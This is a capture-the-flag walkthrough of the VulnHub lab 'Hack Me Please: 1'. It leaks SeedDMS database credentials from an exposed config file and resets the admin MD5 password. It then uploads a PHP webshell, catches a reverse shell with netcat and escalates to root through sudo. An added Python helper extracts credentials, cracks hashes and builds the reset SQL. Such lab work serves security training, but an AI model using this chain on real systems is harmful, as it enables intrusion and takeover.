Environment setup
HACK ME PLEASE: 1
Download:
https://www.vulnhub.com/entry/hack-me-please-1%2C731/
Difficulty: easy
Information gathering
nmap
┌──(root㉿kali)-[/home/test/桌面]
└─# nmap -sP 192.168.47.0/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-10 11:57 CST
Nmap scan report for 192.168.47.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000084s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.175
Host is up (0.000095s latency).
MAC Address: 00:0C:29:E2:0F:D3 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000055s latency).
MAC Address: 00:50:56:F0:D6:45 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.36 seconds
Next, port-scan the target (192.168.47.175, the only non-VMware-infrastructure host in the sweep) to see which ports and services are open. Port 80 (HTTP) is up.
Visit port 80
Only a few static-looking pages, with almost no functionality.
While going through the page source and the JS files,
I found something that looks like a CMS, together with a version number (SeedDMS 5.1.22, as the download below shows).
Check whether this CMS is open source.
Obtain the open-source code
Find and download the matching version:
https://sourceforge.net/projects/seeddms/files/seeddms-5.1.22/seeddms-quickstart-5.1.22.tar.gz/download
Using the downloaded source, locate the corresponding configuration file on the target. It is served without authentication:
http://192.168.47.175/seeddms51x/conf/settings.xml
It contains the MySQL credentials (the database host, name, user and password are stored in plaintext).
There is also a table containing users:
MySQL [seeddms]> select * from tblUsers;
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | md5('123456') | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+---------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
MySQL [seeddms]> update tblUsers set pwd=md5('123456') where id=1;
Query OK, 1 row affected (0.002 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | e10adc3949ba59abbe56e057f20f883e | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
MySQL [seeddms]> Ctrl-C -- exit!
Aborted
Successfully reset the admin password. The pwd column is a plain, unsalted MD5 hex digest, which is why a bare md5('...') is enough to set a known password.
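The two steps above (pull the database credentials out of the exposed settings.xml, then reset the admin hash) as an added Python example. This is not code from the original page or from the SeedDMS project. It parses a constructed settings.xml sample that follows SeedDMS's own element and attribute names (the values are made up, not the target's), builds the mysql command line, checks a dumped pwd value against a small wordlist, and produces the same UPDATE the page ran.

```python
import hashlib
import shlex
import xml.etree.ElementTree as ET

# Constructed sample of a SeedDMS conf/settings.xml. The element and attribute
# names follow SeedDMS's config file; the values are invented for this example,
# not the ones from the target.
SAMPLE_SETTINGS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <site>
    <siteName>SeedDMS</siteName>
  </site>
  <system>
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms"
              dbUser="seeddms" dbPass="seeddms" doNotCheckVersion="false"/>
  </system>
</configuration>
"""

DB_ATTRS = ("dbDriver", "dbHostname", "dbDatabase", "dbUser", "dbPass")


def extract_db_credentials(xml_text):
    """Return the <database .../> attributes from a settings.xml as a dict."""
    root = ET.fromstring(xml_text)
    db = root.find(".//database")
    if db is None:
        raise ValueError("settings.xml has no <database> element")
    return {name: db.get(name, "") for name in DB_ATTRS}


def mysql_cli_command(creds):
    """Shell command to open the database with the extracted credentials."""
    return " ".join(shlex.quote(a) for a in (
        "mysql", "-h", creds["dbHostname"], "-u", creds["dbUser"],
        "-p" + creds["dbPass"], creds["dbDatabase"]))


def md5_hex(password):
    """tblUsers.pwd holds an unsalted MD5 hex digest, as the dump above shows."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_md5(stored_hash, wordlist):
    """Try each candidate against a dumped pwd value; None if nothing matches."""
    stored_hash = stored_hash.strip().lower()
    for candidate in wordlist:
        if md5_hex(candidate) == stored_hash:
            return candidate
    return None


def build_reset_sql(login, new_password):
    """UPDATE equivalent to the one run on the page (which matched on id=1).
    The hash is hex, so only the login needs quoting."""
    safe_login = login.replace("'", "''")
    return (f"UPDATE tblUsers SET pwd='{md5_hex(new_password)}' "
            f"WHERE login='{safe_login}';")


if __name__ == "__main__":
    creds = extract_db_credentials(SAMPLE_SETTINGS_XML)
    print(mysql_cli_command(creds))
    print(build_reset_sql("admin", "123456"))
    print(crack_md5("e10adc3949ba59abbe56e057f20f883e", ["password", "admin", "123456"]))
```

Before overwriting the hash, try crack_md5 on the dumped value first: a recovered password is usually reused elsewhere on the box (SSH, su), whereas a reset only gets you into the web application and is visible to the admin.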
Upload endpoint
After logging in as admin, there is an upload endpoint.
Files can be uploaded directly, with no extension check.
Since the application is written in PHP, I tried uploading a PHP file, but for some reason only a file named 1.php would work; any other filename would not... I was stuck here for a long time.
A Google search turned up where uploaded files are stored on disk:
https://bryanleong98.medium.com/cve-2019-12744-remote-command-execution-through-unvalidated-file-upload-in-seeddms-versions-5-1-1-5c32d90fda28
getshell
Locate the uploaded file and request it. As the writeup above describes, SeedDMS stores each uploaded document under data/1048576/<document id>/ with the version number as the filename, so the first version of the upload is reached as .../data/1048576/<document id>/1.php whatever the original filename was (the path /var/www/html/seeddms51x/data/1048576/25 in the shell session below is exactly this layout).
The webshell can be managed with Godzilla (哥斯拉).
Of course, we can also pop a reverse shell now.
Using an online reverse-shell generator:
https://forum.ywhack.com/shell.php
Reverse shell received.
Privilege escalation
┌──(root㉿kali)-[/home/test/桌面]
└─# nc -lvvp 9999
listening on [any] 9999 ...
192.168.47.175: inverse host lookup failed: Unknown host
connect to [192.168.47.156] from (UNKNOWN) [192.168.47.175] 40354
whoami
www-data
tty
not a tty
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ su saket
su saket
Password: Saket@#$1337
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(ALL : ALL) ALL
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ su root
su root
Password: root
su: Authentication failure
saket@ubuntu:/var/www/html/seeddms51x/data/1048576/25$ sudo -i
sudo -i
root@ubuntu:~#